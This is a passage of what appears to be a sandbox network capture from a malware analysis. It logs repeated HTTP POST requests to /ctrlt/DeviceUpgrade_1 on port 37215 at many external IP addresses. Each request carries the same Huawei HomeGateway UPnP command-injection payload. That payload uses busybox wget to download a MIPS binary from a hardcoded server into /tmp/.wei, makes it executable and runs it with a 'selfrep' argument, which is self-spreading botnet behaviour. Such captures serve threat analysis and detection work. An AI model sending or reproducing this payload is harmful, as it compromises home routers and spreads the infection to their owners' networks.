                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          352192.168.2.2343474157.34.185.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178153038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          353192.168.2.2359494157.47.107.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178155899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          354192.168.2.233595041.175.40.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178364992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          355192.168.2.2354608157.78.112.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178366899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          356192.168.2.2353454167.246.223.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178375959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          357192.168.2.233837412.201.212.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178380013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          358192.168.2.2341166157.155.66.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178394079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          359192.168.2.2358782132.238.144.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178414106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          360192.168.2.2347404157.76.8.2337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178415060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          361192.168.2.2353012197.237.218.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178426027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          362192.168.2.235987241.97.52.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.178427935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
